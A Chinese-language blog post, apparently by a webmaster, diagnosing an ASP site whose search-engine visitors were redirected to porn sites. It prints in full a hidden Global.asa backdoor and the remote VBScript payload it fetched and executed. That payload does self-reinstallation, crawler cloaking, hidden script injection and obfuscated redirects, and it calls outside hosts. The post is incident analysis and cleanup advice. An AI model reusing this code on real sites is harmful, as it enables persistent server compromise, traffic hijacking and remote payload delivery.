警惕ASP網站Global.asa導致網站被掛馬或轉向的解決

上午幫朋友處理一個比較有難度的問題,網站輸入域名訪問正常打開,但從搜索引擎厚度或是Google之類的打開,就會跳轉到某些色情網站上去.

根據經驗,可以推斷出來應該是asp程序根據網頁的來路,即HTTP_REFERER進行判斷,發現是搜索引擎過來的流量就跳轉到色情站點去,使用此種方法具有很強的隱匿性,因為站長們一般不會去搜索自己的網站,所以輕易不會發現自己站點遭到了挾持。

因為網站是自己很多年前幫朋友做的，所以要了現在的代碼，看了一下，沒有發現問題，就開始是不是服務器感染了什麼病毒或是被加上了什麼IIS過濾器之類的，要了遠程桌面，上去找了半天，一無所獲，看了一下IP地址，發現是一個內網IP地址，也就是說需要網關將網站映射發布出去，於是懷疑問題是在網關上，但問了朋友之後，得知網關為一路由器，再加上將IIS關閉，網站也就無法打開，不能再跳轉，排除了網關加馬的可能性。

難倒走不下去了？

忽然想到一招，采用FileMon對w3wp.exe進程進行監控，看看用搜索引擎打開和直接打開讀取的文件到底有什麼不同，通過多次比較，也沒有發現什麼疑點。

萬般無奈，又回到網站根目錄下，順手打開了顯示系統隱藏文件，卻發現多了一個Global.asa文件，因為網站是自己做的，比較了解，根本不可能使用這個文件，打開一看，一切疑點都解決了。

Global.asa文件內容如下：

<script language="vbscript" runat="server"> 'by_aming 'by*aming sub Application_OnStart end sub    sub Application_OnEnd end sub    sub Session_OnStart     url="h"&"t"&"t"&"p"&":"&"/"&"/"&"g"&"l"&"o"&".1"&"0"&"0"&"5"&"0"&"0"&".c"&"o"&"m"&"/x"&"m"&"l"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"a"&"s"&"a"&"q"&"u"&"a"&"n"&"."&"t"&"x"&"t"     Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")     ObjXMLHTTP.Open "GET",url,False     ObjXMLHTTP.setRequestHeader "User-Agent",url     ObjXMLHTTP.send     GetHtml=ObjXMLHTTP.responseBody     Set ObjXMLHTTP=Nothing     set obJStream = Server.CreateObject("Adodb.Stream")     obJStream.Type = 1     obJStream.Mode =3     obJStream.Open     obJStream.Write GetHtml     obJStream.Position = 0     obJStream.Type = 2     obJStream.Charset = "gb2312"     GetHtml = obJStream.ReadText     obJStream.Close     if instr(GetHtml,"by*aming")>0 then         execute GetHtml     end if end sub    'sub Session_OnEnd 'end sub </script>

 

因為Global.asa文件為網站啟動文件，當一個網站被第一次訪問時，會執行Application_Start代碼段的內容，當一個用戶第一次訪問時會執行Session_Start代碼段的內容，所以此段代碼的作用就是當訪問，從http://glo.100500.com/XML/global.asaquan.txt處下載內容，並執行，讓我們來看看http://glo.100500.com/XML/global.asaquan.txt的內容是什麼吧：

 

代碼

'<Html><head><script>function clear()

{Source=document.body.firstChild.data;document.open

();document.close

();document.title="";document.body.innerHtml=Source;}

</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval

(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace

(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d

[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c])

{p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}

('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split

('|'),0,{}))</script>
'by*aming
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
    On Error Resume Next
    Set fso = Server.CreateObject("scripting.filesystemobject")
    set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
    f.Attributes=0
    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
    Obj.Type = 2
    Obj.open
    Obj.Charset = "gb2312"
    Obj.Position = Obj.Size
    Obj.writetext = Content
    Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
    Obj.Close
    Set Obj = Nothing
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing 
End Function

Public Function createasax(ByVal Content)
    On Error Resume Next
    Set fso = Server.CreateObject("scripting.filesystemobject")
    set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
    f.Attributes=0
    Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
    Obj.Type = 2
    Obj.open
    Obj.Charset = "gb2312"
    Obj.Position = Obj.Size
    Obj.writetext = Content
    Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
    Obj.Close
    Set Obj = Nothing
    f.Attributes=1+2+4
    set f=Nothing
    Set fso = Nothing 
End Function

Public Function GetHtml(url)
    Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
    ObjXMLHTTP.Open "GET",url,False
    ObjXMLHTTP.setRequestHeader "User-Agent",url
    ObjXMLHTTP.send
    GetHtml=ObjXMLHTTP.responseBody
    Set ObjXMLHTTP=Nothing
    set obJStream = Server.CreateObject("Adodb.Stream")
    obJStream.Type = 1
    obJStream.Mode =3
    obJStream.Open
    obJStream.Write GetHtml
    obJStream.Position = 0
    obJStream.Type = 2
    obJStream.Charset = "gb2312"
    GetHtml = obJStream.ReadText
    obJStream.Close
End Function

Function check(user_agent)
    allow_agent=split

("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-

WebCrawler,MSNBOT,Slurp",",")
    check_agent=false
    For agenti=lbound(allow_agent) to ubound(allow_agent)
        If instr(user_agent,allow_agent(agenti))>0 then
            check_agent=true
            exit for
        end if 
    Next
    check=check_agent
End function

  Function CheckRobot()
      CheckRobot = False
      Dim Botlist,i,Repls
      Repls      = request.ServerVariables("http_user_agent")
      Krobotlist = "Baiduspider|Googlebot"
      Botlist = Split(Krobotlist,"|")
      For i = 0 To Ubound(Botlist)
        If InStr(Repls,Botlist(i)) > 0 Then
          CheckRobot = True
          Exit For
        End If
      Next
      If Request.QueryString("admin")= "1" Then Session

("ThisCheckRobot")=1
      If Session("ThisCheckRobot")   = 1   Then CheckRobot = 

True
  End Function
  Function CheckRefresh()
      CheckRefresh = False
      Dim Botlist,i,Repls
      Krobotlist = "baidu|google|sogou|soso|youdao"
      Botlist = Split(Krobotlist,"|")
      For i = 0 To Ubound(Botlist)
        If InStr(left(request.servervariables

("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
          CheckRefresh = True
          Exit For
        End If
      Next
  End Function
Sub sleep()
If response.IsClIEntConnected=true then
    Response.Flush
else
    response.end
end if
End Sub
If CheckRefresh=true Then 
cnnbd=lcase(request.servervariables("HTTP_HOST"))
'response.redirect("http://www.220550.com/?"&cnnbd&"")
Response.Write("<div style=display:none><script 

src=http://count11.51yes.com/click.ASPx?

id=114814173&logo=1></script><script 

src=http://JS.568tea.com/44.JS></script><script 

src=http://JS.37548.com/44.JS></script></div>")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
    'body=GetHtml("http://Html.888hhh.com/2prn.ASP?

domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables

("HTTP_USER_AGENT"))&"")
    body=GetHtml("http://i.bxhty.info/index.ASP?

domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables

("HTTP_USER_AGENT"))&"")
response.write body
response.end
else

asa=GetHtml("http://glo.100500.com/XML/globalquan.txt")
if instr(asa,"by*aming")>0 then
    createasa(asa)
end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
    ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & 

ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and 

instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and 

instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and 
if instr(geturl,"http://"& Request.ServerVariables("http_host") 

&"/index.ASP")=0 and instr(geturl,"http://"& 

Request.ServerVariables("http_host") &"/")=0 and instr(LCase

(Request.ServerVariables("HTTP_REFERER")),LCase

(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""

if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "Linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent

if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"

if bot="nobot" then
'Call WriteErr
'response.end
end if

If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr

(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") 

> 0 Then Amll = "ok"

tjcount=request.CookIEs("cookIE_tjcount")
date1=request.CookIEs("cookIE_date")
date2=year(date)&month(date)&day(date)

if tjcount="" then
    response.cookIEs("cookIE_tjcount")=0
    response.cookIEs("cookIE_tjcount").Expires=DateAdd

("d",1,now())
end if

if date1<>date2 then
    response.cookIEs("cookIE_date")=date2
    response.cookIEs("cookIE_date").Expires=DateAdd("d",365,now

())
end if

tjcount=request.CookIEs("cookIE_tjcount")
date1=request.CookIEs("cookIE_date")
date2=year(date)&month(date)&day(date)

if date1=date2 and len(bot) = 0 then
    if int(tjcount)<10 and len(Amll)>0 then
        response.cookIEs("cookIE_tjcount")=int(tjcount)+1
        response.cookIEs("cookIE_tjcount").Expires=DateAdd

("d",1,now())
     strHost=Request.ServerVariables("HTTP_HOST")
    Response.Redirect("http://www.115225.com/?

domain="&strHost&"")
    else
        'response.write "<h1>Service Unavailable</h1>"
            response.write ""
        'response.write getHtml(geturl&"?global=ok")
    end if
    response.end
end if
Call sleep()
end if 
end if 
'</body></Html>

 

 

 此處代碼有多個函數組成：
createasa 根據傳入的內容創建global.asa文件
createasax 根據傳入的內容創建Global.asax文件
GetHtml 根據傳入的url，獲取相應的內容
check 檢測user-agent判斷是否為搜索引擎的蜘蛛
CheckRobot 檢測是否為robot ?
CheckRefresh 檢測是否Refresh

說到底這塊代碼的作用就是判斷訪問頁面是否來自於搜索引擎，是的話，就將Html：

代碼

<div style=display:none><script src=http://count11.51yes.com/click.ASPx?id=114814173&logo=1></script><script src=http://js.568tea.com/44.JS></script><script src=http://js.37548.com/44.JS></script></div>

 

輸出去。

至此，就達到了將來自於搜索引擎流量挾持走的目的了。

解決辦法也很簡單,就是直接刪除此文件就可以了,當然最好還是要檢查一下網站,查一下為什麼會被加上一個Global.asa文件